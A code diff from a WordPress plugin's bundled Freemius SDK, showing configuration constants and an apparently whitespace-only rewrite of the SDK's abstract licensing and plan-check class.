+    #--------------------------------------------------------------------------------
+    #region Directories
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__DIR' ) ) {
+        define( 'WP_FS__DIR', dirname( __FILE__ ) );
+    }
+    if ( ! defined( 'WP_FS__DIR_INCLUDES' ) ) {
+        define( 'WP_FS__DIR_INCLUDES', WP_FS__DIR . '/includes' );
+    }
+    if ( ! defined( 'WP_FS__DIR_TEMPLATES' ) ) {
+        define( 'WP_FS__DIR_TEMPLATES', WP_FS__DIR . '/templates' );
+    }
+    if ( ! defined( 'WP_FS__DIR_ASSETS' ) ) {
+        define( 'WP_FS__DIR_ASSETS', WP_FS__DIR . '/assets' );
+    }
+    if ( ! defined( 'WP_FS__DIR_CSS' ) ) {
+        define( 'WP_FS__DIR_CSS', WP_FS__DIR_ASSETS . '/css' );
+    }
+    if ( ! defined( 'WP_FS__DIR_JS' ) ) {
+        define( 'WP_FS__DIR_JS', WP_FS__DIR_ASSETS . '/js' );
+    }
+    if ( ! defined( 'WP_FS__DIR_IMG' ) ) {
+        define( 'WP_FS__DIR_IMG', WP_FS__DIR_ASSETS . '/img' );
+    }
+    if ( ! defined( 'WP_FS__DIR_SDK' ) ) {
+        define( 'WP_FS__DIR_SDK', WP_FS__DIR_INCLUDES . '/sdk' );
+    }
+
+    #endregion
+
+    /**
+     * Domain / URL / Address
+     */
+    define( 'WP_FS__ROOT_DOMAIN_PRODUCTION', 'freemius.com' );
+    define( 'WP_FS__DOMAIN_PRODUCTION', 'wp.freemius.com' );
+    define( 'WP_FS__ADDRESS_PRODUCTION', 'https://' . WP_FS__DOMAIN_PRODUCTION );
+
+    if ( ! defined( 'WP_FS__DOMAIN_LOCALHOST' ) ) {
+        define( 'WP_FS__DOMAIN_LOCALHOST', 'wp.freemius' );
+    }
+    if ( ! defined( 'WP_FS__ADDRESS_LOCALHOST' ) ) {
+        define( 'WP_FS__ADDRESS_LOCALHOST', 'http://' . WP_FS__DOMAIN_LOCALHOST . ':8080' );
+    }
+
+    if ( ! defined( 'WP_FS__TESTING_DOMAIN' ) ) {
+        define( 'WP_FS__TESTING_DOMAIN', 'fswp' );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region HTTP
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__IS_HTTP_REQUEST' ) ) {
+        define( 'WP_FS__IS_HTTP_REQUEST', isset( $_SERVER['HTTP_HOST'] ) && isset( $_SERVER['REQUEST_METHOD'] ) );
+    }
+
+    if ( ! defined( 'WP_FS__IS_HTTPS' ) ) {
+        define( 'WP_FS__IS_HTTPS', ( WP_FS__IS_HTTP_REQUEST &&
+                                     // Checks if CloudFlare's HTTPS (Flexible SSL support).
+                                     isset( $_SERVER['HTTP_X_FORWARDED_PROTO'] ) &&
+                                     'https' === strtolower( $_SERVER['HTTP_X_FORWARDED_PROTO'] )
+                                   ) ||
+                                   // Check if HTTPS request.
+                                   ( isset( $_SERVER['HTTPS'] ) && 'on' == $_SERVER['HTTPS'] ) ||
+                                   ( isset( $_SERVER['SERVER_PORT'] ) && 443 == $_SERVER['SERVER_PORT'] )
+        );
+    }
+
+    if ( ! defined( 'WP_FS__IS_POST_REQUEST' ) ) {
+        define( 'WP_FS__IS_POST_REQUEST', ( WP_FS__IS_HTTP_REQUEST &&
+                                            strtoupper( $_SERVER['REQUEST_METHOD'] ) == 'POST' ) );
+    }
+
+    if ( ! defined( 'WP_FS__REMOTE_ADDR' ) ) {
+        define( 'WP_FS__REMOTE_ADDR', fs_get_ip() );
+    }
+
+    if ( ! defined( 'WP_FS__IS_LOCALHOST' ) ) {
+        if ( defined( 'WP_FS__LOCALHOST_IP' ) ) {
+            define( 'WP_FS__IS_LOCALHOST', ( WP_FS__LOCALHOST_IP === WP_FS__REMOTE_ADDR ) );
+        } else {
+            define( 'WP_FS__IS_LOCALHOST', WP_FS__IS_HTTP_REQUEST &&
+                                           is_string( WP_FS__REMOTE_ADDR ) &&
+                                           ( substr( WP_FS__REMOTE_ADDR, 0, 4 ) === '127.' ||
+                                             WP_FS__REMOTE_ADDR === '::1' )
+            );
+        }
+    }
+
+    if ( ! defined( 'WP_FS__IS_LOCALHOST_FOR_SERVER' ) ) {
+        define( 'WP_FS__IS_LOCALHOST_FOR_SERVER', ( ! WP_FS__IS_HTTP_REQUEST ||
+                                                    false !== strpos( $_SERVER['HTTP_HOST'], 'localhost' ) ) );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__IS_PRODUCTION_MODE' ) ) {
+        // By default, run with Freemius production servers.
+        define( 'WP_FS__IS_PRODUCTION_MODE', true );
+    }
+
+    if ( ! defined( 'WP_FS__ADDRESS' ) ) {
+        define( 'WP_FS__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? WP_FS__ADDRESS_PRODUCTION : WP_FS__ADDRESS_LOCALHOST ) );
+    }
+
+
+    #--------------------------------------------------------------------------------
+    #region API
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__API_ADDRESS_LOCALHOST' ) ) {
+        define( 'WP_FS__API_ADDRESS_LOCALHOST', 'http://api.freemius-local.com:8080' );
+    }
+    if ( ! defined( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST' ) ) {
+        define( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST', 'http://sandbox-api.freemius:8080' );
+    }
+
+    // Set API address for local testing.
+    if ( ! WP_FS__IS_PRODUCTION_MODE ) {
+        if ( ! defined( 'FS_API__ADDRESS' ) ) {
+            define( 'FS_API__ADDRESS', WP_FS__API_ADDRESS_LOCALHOST );
+        }
+        if ( ! defined( 'FS_API__SANDBOX_ADDRESS' ) ) {
+            define( 'FS_API__SANDBOX_ADDRESS', WP_FS__API_SANDBOX_ADDRESS_LOCALHOST );
+        }
+    }
+
+    #endregion
+
+    #--------------------------------------------------------------------------------
+    #region Checkout
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'FS_CHECKOUT__ADDRESS_PRODUCTION' ) ) {
+        define( 'FS_CHECKOUT__ADDRESS_PRODUCTION', 'https://checkout.freemius.com' );
+    }
+
+    if ( ! defined( 'FS_CHECKOUT__ADDRESS_LOCALHOST' ) ) {
+        define( 'FS_CHECKOUT__ADDRESS_LOCALHOST', 'http://checkout.freemius-local.com:8080' );
+    }
+
+    if ( ! defined( 'FS_CHECKOUT__ADDRESS' ) ) {
+        define( 'FS_CHECKOUT__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? FS_CHECKOUT__ADDRESS_PRODUCTION : FS_CHECKOUT__ADDRESS_LOCALHOST ) );
+    }
+
+    #endregion
+
+    define( 'WP_FS___OPTION_PREFIX', 'fs' . ( WP_FS__IS_PRODUCTION_MODE ? '' : '_dbg' ) . '_' );
+
+    if ( ! defined( 'WP_FS__ACCOUNTS_OPTION_NAME' ) ) {
+        define( 'WP_FS__ACCOUNTS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'accounts' );
+    }
+    if ( ! defined( 'WP_FS__API_CACHE_OPTION_NAME' ) ) {
+        define( 'WP_FS__API_CACHE_OPTION_NAME', WP_FS___OPTION_PREFIX . 'api_cache' );
+    }
+    if ( ! defined( 'WP_FS__GDPR_OPTION_NAME' ) ) {
+        define( 'WP_FS__GDPR_OPTION_NAME', WP_FS___OPTION_PREFIX . 'gdpr' );
+    }
+    define( 'WP_FS__OPTIONS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'options' );
+
+    /**
+     * Module types
+     *
+     * @since 1.2.2
+     */
+    define( 'WP_FS__MODULE_TYPE_PLUGIN', 'plugin' );
+    define( 'WP_FS__MODULE_TYPE_THEME', 'theme' );
+
+    /**
+     * Billing Frequencies
+     */
+    define( 'WP_FS__PERIOD_ANNUALLY', 'annual' );
+    define( 'WP_FS__PERIOD_MONTHLY', 'monthly' );
+    define( 'WP_FS__PERIOD_LIFETIME', 'lifetime' );
+
+    /**
+     * Plans
+     */
+    define( 'WP_FS__PLAN_DEFAULT_PAID', false );
+    define( 'WP_FS__PLAN_FREE', 'free' );
+    define( 'WP_FS__PLAN_TRIAL', 'trial' );
+
+    /**
+     * Times in seconds
+     */
+    if ( ! defined( 'WP_FS__TIME_5_MIN_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_5_MIN_IN_SEC', 300 );
+    }
+    if ( ! defined( 'WP_FS__TIME_10_MIN_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_10_MIN_IN_SEC', 600 );
+    }
+//	define( 'WP_FS__TIME_15_MIN_IN_SEC', 900 );
+    if ( ! defined( 'WP_FS__TIME_12_HOURS_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_12_HOURS_IN_SEC', 43200 );
+    }
+    if ( ! defined( 'WP_FS__TIME_24_HOURS_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_24_HOURS_IN_SEC', WP_FS__TIME_12_HOURS_IN_SEC * 2 );
+    }
+    if ( ! defined( 'WP_FS__TIME_WEEK_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_WEEK_IN_SEC', 7 * WP_FS__TIME_24_HOURS_IN_SEC );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region Debugging
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__DEBUG_SDK' ) ) {
+        $debug_mode = get_option( 'fs_debug_mode', null );
+
+        if ( $debug_mode === null ) {
+            $debug_mode = false;
+            add_option( 'fs_debug_mode', $debug_mode );
+        }
+
+        define( 'WP_FS__DEBUG_SDK', is_numeric( $debug_mode ) ? ( 0 < $debug_mode ) : WP_FS__DEV_MODE );
+    }
+
+    if ( ! defined( 'WP_FS__ECHO_DEBUG_SDK' ) ) {
+        define( 'WP_FS__ECHO_DEBUG_SDK', WP_FS__DEV_MODE && ! empty( $_GET['fs_dbg_echo'] ) );
+    }
+    if ( ! defined( 'WP_FS__LOG_DATETIME_FORMAT' ) ) {
+        define( 'WP_FS__LOG_DATETIME_FORMAT', 'Y-m-d H:i:s' );
+    }
+    if ( ! defined( 'FS_API__LOGGER_ON' ) ) {
+        define( 'FS_API__LOGGER_ON', WP_FS__DEBUG_SDK );
+    }
+
+    if ( WP_FS__ECHO_DEBUG_SDK ) {
+        error_reporting( E_ALL );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__SCRIPT_START_TIME' ) ) {
+        define( 'WP_FS__SCRIPT_START_TIME', time() );
+    }
+    if ( ! defined( 'WP_FS__DEFAULT_PRIORITY' ) ) {
+        define( 'WP_FS__DEFAULT_PRIORITY', 10 );
+    }
+    if ( ! defined( 'WP_FS__LOWEST_PRIORITY' ) ) {
+        define( 'WP_FS__LOWEST_PRIORITY', 999999999 );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region Multisite Network
+    #--------------------------------------------------------------------------------
+
+    /**
+     * Do not use this define directly, it will have the wrong value
+     * during plugin uninstall/deletion when the inclusion of the plugin
+     * is triggered due to registration with register_uninstall_hook().
+     *
+     * Instead, use fs_is_network_admin().
+     *
+     * @author Vova Feldman (@svovaf)
+     */
+    if ( ! defined( 'WP_FS__IS_NETWORK_ADMIN' ) ) {
+        define( 'WP_FS__IS_NETWORK_ADMIN',
+            is_multisite() &&
+            ( is_network_admin() ||
+              ( ( defined( 'DOING_AJAX' ) && DOING_AJAX &&
+                  ( isset( $_REQUEST['_fs_network_admin'] ) && 'true' === $_REQUEST['_fs_network_admin'] /*||
+                    ( ! empty( $_REQUEST['action'] ) && 'delete-plugin' === $_REQUEST['action'] )*/ )
+                ) ||
+                // Plugin uninstall.
+                defined( 'WP_UNINSTALL_PLUGIN' ) )
+            )
+        );
+    }
+
+    /**
+     * Do not use this define directly, it will have the wrong value
+     * during plugin uninstall/deletion when the inclusion of the plugin
+     * is triggered due to registration with register_uninstall_hook().
+     *
+     * Instead, use fs_is_blog_admin().
+     *
+     * @author Vova Feldman (@svovaf)
+     */
+    if ( ! defined( 'WP_FS__IS_BLOG_ADMIN' ) ) {
+        define( 'WP_FS__IS_BLOG_ADMIN', is_blog_admin() || ( defined( 'DOING_AJAX' ) && DOING_AJAX && isset( $_REQUEST['_fs_blog_admin'] ) ) );
+    }
+
+    if ( ! defined( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED' ) ) {
+        // Set to true to show network level settings even if delegated to site admins.
+        define( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED', false );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__DEMO_MODE' ) ) {
+        define( 'WP_FS__DEMO_MODE', false );
+    }
+    if ( ! defined( 'FS_SDK__SSLVERIFY' ) ) {
+        define( 'FS_SDK__SSLVERIFY', false );
+    }
--- a/filr-protection/inc/freemius/includes/class-freemius-abstract.php
+++ b/filr-protection/inc/freemius/includes/class-freemius-abstract.php
@@ -1,538 +1,538 @@
-<?php
-	/**
-	 * @package     Freemius
-	 * @copyright   Copyright (c) 2015, Freemius, Inc.
-	 * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
-	 * @since       1.0.7
-	 */
-
-	if ( ! defined( 'ABSPATH' ) ) {
-		exit;
-	}
-
-
-	/**
-	 * - Each instance of Freemius class represents a single plugin
-	 * install by a single user (the installer of the plugin).
-	 *
-	 * - Each website can only have one install of the same plugin.
-	 *
-	 * - Install entity is only created after a user connects his account with Freemius.
-	 *
-	 * Class Freemius_Abstract
-	 */
-	abstract class Freemius_Abstract {
-
-		#----------------------------------------------------------------------------------
-		#region Identity
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if user has connected his account (opted-in).
-		 *
-		 * Note:
-		 *      If the user opted-in and opted-out on a later stage,
-		 *      this will still return true. If you want to check if the
-		 *      user is currently opted-in, use:
-		 *          `$fs->is_registered() && $fs->is_tracking_allowed()`
-		 *
-		 * @since 1.0.1
-         *
-         * @param bool $ignore_anonymous_state Since 2.5.1
-         *
-		 * @return bool
-		 */
-		abstract function is_registered( $ignore_anonymous_state = false );
-
-		/**
-		 * Check if the user skipped connecting the account with Freemius.
-		 *
-		 * @since 1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_anonymous();
-
-		/**
-		 * Check if the user currently in activation mode.
-		 *
-		 * @since 1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_activation_mode();
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Module Type
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Checks if the plugin's type is "plugin". The other type is "theme".
-		 *
-		 * @author Leo Fajardo (@leorw)
-		 * @since  1.2.2
-		 *
-		 * @return bool
-		 */
-		abstract function is_plugin();
-
-		/**
-		 * Checks if the module type is "theme". The other type is "plugin".
-		 *
-		 * @author Leo Fajardo (@leorw)
-		 * @since  1.2.2
-		 *
-		 * @return bool
-		 */
-		function is_theme() {
-			return ( ! $this->is_plugin() );
-		}
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Permissions
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if plugin must be WordPress.org compliant.
-		 *
-		 * @since 1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_org_repo_compliant();
-
-		/**
-		 * Check if plugin is allowed to install executable files.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.5
-		 *
-		 * @return bool
-		 */
-		function is_allowed_to_install() {
-			return ( $this->is_premium() || ! $this->is_org_repo_compliant() );
-		}
-
-		#endregion
-
-		/**
-		 * Check if user in trial or in free plan (not paying).
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.4
-		 *
-		 * @return bool
-		 */
-		function is_not_paying() {
-			return ( $this->is_trial() || $this->is_free_plan() );
-		}
-
-		/**
-		 * Check if the user has an activated and valid paid license on current plugin's install.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_paying();
-
-		/**
-		 * Check if the user is paying or in trial.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		function is_paying_or_trial() {
-			return ( $this->is_paying() || $this->is_trial() );
-		}
-
-		/**
-		 * Check if user in a trial or have feature enabled license.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.7
-		 *
-		 * @return bool
-		 */
-		abstract function can_use_premium_code();
-
-		#----------------------------------------------------------------------------------
-		#region Premium Only
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * All logic wrapped in methods with "__premium_only()" suffix will be only
-		 * included in the premium code.
-		 *
-		 * Example:
-		 *      if ( freemius()->is__premium_only() ) {
-		 *          ...
-		 *      }
-		 */
-
-		/**
-		 * Returns true when running premium plugin code.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		function is__premium_only() {
-			return $this->is_premium();
-		}
-
-		/**
-		 * Check if the user has an activated and valid paid license on current plugin's install.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 *
-		 */
-		function is_paying__premium_only() {
-			return ( $this->is__premium_only() && $this->is_paying() );
-		}
-
-		/**
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		function is_plan__premium_only( $plan, $exact = false ) {
-			return ( $this->is_premium() && $this->is_plan( $plan, $exact ) );
-		}
-
-		/**
-		 * Check if plan matches active license' plan or active trial license' plan.
-		 *
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		function is_plan_or_trial__premium_only( $plan, $exact = false ) {
-			return ( $this->is_premium() && $this->is_plan_or_trial( $plan, $exact ) );
-		}
-
-		/**
-		 * Check if the user is paying or in trial.
-		 *
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		function is_paying_or_trial__premium_only() {
-			return $this->is_premium() && $this->is_paying_or_trial();
-		}
-
-		/**
-		 * Check if the user has an activated and valid paid license on current plugin's install.
-		 *
-		 * @since      1.0.4
-		 *
-		 * @return bool
-		 *
-		 * @deprecated Method name is confusing since it's not clear from the name the code will be removed.
-		 * @using      Alias to is_paying__premium_only()
-		 */
-		function is_paying__fs__() {
-			return $this->is_paying__premium_only();
-		}
-
-		/**
-		 * Check if user in a trial or have feature enabled license.
-		 *
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.9
-		 *
-		 * @return bool
-		 */
-		function can_use_premium_code__premium_only() {
-			return $this->is_premium() && $this->can_use_premium_code();
-		}
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Trial
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if the user in a trial.
-		 *
-		 * @since 1.0.3
-		 *
-		 * @return bool
-		 */
-		abstract function is_trial();
-
-		/**
-		 * Check if trial already utilized.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_trial_utilized();
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Plans
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if the user is on the free plan of the product.
-		 *
-		 * @since 1.0.4
-		 *
-		 * @return bool
-		 */
-		abstract function is_free_plan();
-
-		/**
-		 * @since  1.0.2
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		abstract function is_plan( $plan, $exact = false );
-
-		/**
-		 * Check if plan based on trial. If not in trial mode, should return false.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		abstract function is_trial_plan( $plan, $exact = false );
-
-		/**
-		 * Check if plan matches active license' plan or active trial license' plan.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		function is_plan_or_trial( $plan, $exact = false ) {
-			return $this->is_plan( $plan, $exact ) ||
-			       $this->is_trial_plan( $plan, $exact );
-		}
-
-		/**
-		 * Check if plugin has any paid plans.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function has_paid_plan();
-
-		/**
-		 * Check if plugin has any free plan, or is it premium only.
-		 *
-		 * Note: If no plans configured, assume plugin is free.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function has_free_plan();
-
-		/**
-		 * Check if plugin is premium only (no free plans).
-		 *
-		 * NOTE: is__premium_only() is very different method, don't get confused.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_only_premium();
-
-		/**
-		 * Check if module has a premium code version.
-		 *
-		 * Serviceware module might be freemium without any
-		 * premium code version, where the paid features
-		 * are all part of the service.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.2.1.6
-		 *
-		 * @return bool
-		 */
-		abstract function has_premium_version();
-
-		/**
-		 * Check if module has any release on Freemius,
-		 * or all plugin's code is on WordPress.org (Serviceware).
-		 *
-		 * @return bool
-		 */
-		function has_release_on_freemius() {
-			return ! $this->is_org_repo_compliant() ||
-			       $this->has_premium_version();
-		}
-
-		/**
-		 * Checks if it's a freemium plugin.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.9
-		 *
-		 * @return bool
-		 */
-		function is_freemium() {
-			return $this->has_paid_plan() &&
-			       $this->has_free_plan();
-		}
-
-		/**
-		 * Check if module has only one plan.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.2.1.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_single_plan();
-
-		#endregion
-
-		/**
-		 * Check if running payments in sandbox mode.
-		 *
-		 * @since 1.0.4
-		 *
-		 * @return bool
-		 */
-		abstract function is_payments_sandbox();
-
-		/**
-		 * Check if running test vs. live plugin.
-		 *
-		 * @since 1.0.5
-		 *
-		 * @return bool
-		 */
-		abstract function is_live();
-
-		/**
-		 * Check if running premium plugin code.
-		 *
-		 * @since 1.0.5
-		 *
-		 * @return bool
-		 */
-		abstract function is_premium();
-
-		/**
-		 * Get upgrade URL.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.2
-		 *
-		 * @param string $period Billing cycle.
-		 *
-		 * @return string
-		 */
-		abstract function get_upgrade_url( $period = WP_FS__PERIOD_ANNUALLY );
-
-		/**
-		 * Check if Freemius was first added in a plugin update.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.5
-		 *
-		 * @return bool
-		 */
-		function is_plugin_update() {
-			return ! $this->is_plugin_new_install();
-		}
-
-		/**
-		 * Check if Freemius was part of the plugin when the user installed it first.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.5
-		 *
-		 * @return bool
-		 */
-		abstract function is_plugin_new_install();
-
-		#----------------------------------------------------------------------------------
-		#region Marketing
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if current user purchased any other plugins before.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function has_purchased_before();
-
-		/**
-		 * Check if current user classified as an agency.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_agency();
-
-		/**
-		 * Check if current user classified as a developer.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_developer();
-
-		/**
-		 * Check if current user classified as a business.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_business();
-
-		#endregion
+<?php
+	/**
+	 * @package     Freemius
+	 * @copyright   Copyright (c) 2015, Freemius, Inc.
+	 * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
+	 * @since       1.0.7
+	 */
+
+	if ( ! defined( 'ABSPATH' ) ) {
+		exit;
+	}
+
+
+	/**
+	 * - Each instance of Freemius class represents a single plugin
+	 * install by a single user (the installer of the plugin).
+	 *
+	 * - Each website can only have one install of the same plugin.
+	 *
+	 * - Install entity is only created after a user connects his account with Freemius.
+	 *
+	 * Class Freemius_Abstract
+	 */
+	abstract class Freemius_Abstract {
+
+		#----------------------------------------------------------------------------------
+		#region Identity
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if user has connected his account (opted-in).
+		 *
+		 * Note:
+		 *      If the user opted-in and opted-out on a later stage,
+		 *      this will still return true. If you want to check if the
+		 *      user is currently opted-in, use:
+		 *          `$fs->is_registered() && $fs->is_tracking_allowed()`
+		 *
+		 * @since 1.0.1
+         *
+         * @param bool $ignore_anonymous_state Since 2.5.1
+         *
+		 * @return bool
+		 */
+		abstract function is_registered( $ignore_anonymous_state = false );
+
+		/**
+		 * Check if the user skipped connecting the account with Freemius.
+		 *
+		 * @since 1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_anonymous();
+
+		/**
+		 * Check if the user currently in activation mode.
+		 *
+		 * @since 1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_activation_mode();
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Module Type
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Checks if the plugin's type is "plugin". The other type is "theme".
+		 *
+		 * @author Leo Fajardo (@leorw)
+		 * @since  1.2.2
+		 *
+		 * @return bool
+		 */
+		abstract function is_plugin();
+
+		/**
+		 * Checks if the module type is "theme". The other type is "plugin".
+		 *
+		 * @author Leo Fajardo (@leorw)
+		 * @since  1.2.2
+		 *
+		 * @return bool
+		 */
+		function is_theme() {
+			return ( ! $this->is_plugin() );
+		}
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Permissions
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if plugin must be WordPress.org compliant.
+		 *
+		 * @since 1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_org_repo_compliant();
+
+		/**
+		 * Check if plugin is allowed to install executable files.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.5
+		 *
+		 * @return bool
+		 */
+		function is_allowed_to_install() {
+			return ( $this->is_premium() || ! $this->is_org_repo_compliant() );
+		}
+
+		#endregion
+
+		/**
+		 * Check if user in trial or in free plan (not paying).
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.4
+		 *
+		 * @return bool
+		 */
+		function is_not_paying() {
+			return ( $this->is_trial() || $this->is_free_plan() );
+		}
+
+		/**
+		 * Check if the user has an activated and valid paid license on current plugin's install.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_paying();
+
+		/**
+		 * Check if the user is paying or in trial.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		function is_paying_or_trial() {
+			return ( $this->is_paying() || $this->is_trial() );
+		}
+
+		/**
+		 * Check if user in a trial or have feature enabled license.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.7
+		 *
+		 * @return bool
+		 */
+		abstract function can_use_premium_code();
+
+		#----------------------------------------------------------------------------------
+		#region Premium Only
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * All logic wrapped in methods with "__premium_only()" suffix will be only
+		 * included in the premium code.
+		 *
+		 * Example:
+		 *      if ( freemius()->is__premium_only() ) {
+		 *          ...
+		 *      }
+		 */
+
+		/**
+		 * Returns true when running premium plugin code.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		function is__premium_only() {
+			return $this->is_premium();
+		}
+
+		/**
+		 * Check if the user has an activated and valid paid license on current plugin's install.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 *
+		 */
+		function is_paying__premium_only() {
+			return ( $this->is__premium_only() && $this->is_paying() );
+		}
+
+		/**
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		function is_plan__premium_only( $plan, $exact = false ) {
+			return ( $this->is_premium() && $this->is_plan( $plan, $exact ) );
+		}
+
+		/**
+		 * Check if plan matches active license' plan or active trial license' plan.
+		 *
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		function is_plan_or_trial__premium_only( $plan, $exact = false ) {
+			return ( $this->is_premium() && $this->is_plan_or_trial( $plan, $exact ) );
+		}
+
+		/**
+		 * Check if the user is paying or in trial.
+		 *
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		function is_paying_or_trial__premium_only() {
+			return $this->is_premium() && $this->is_paying_or_trial();
+		}
+
+		/**
+		 * Check if the user has an activated and valid paid license on current plugin's install.
+		 *
+		 * @since      1.0.4
+		 *
+		 * @return bool
+		 *
+		 * @deprecated Method name is confusing since it's not clear from the name the code will be removed.
+		 * @using      Alias to is_paying__premium_only()
+		 */
+		function is_paying__fs__() {
+			return $this->is_paying__premium_only();
+		}
+
+		/**
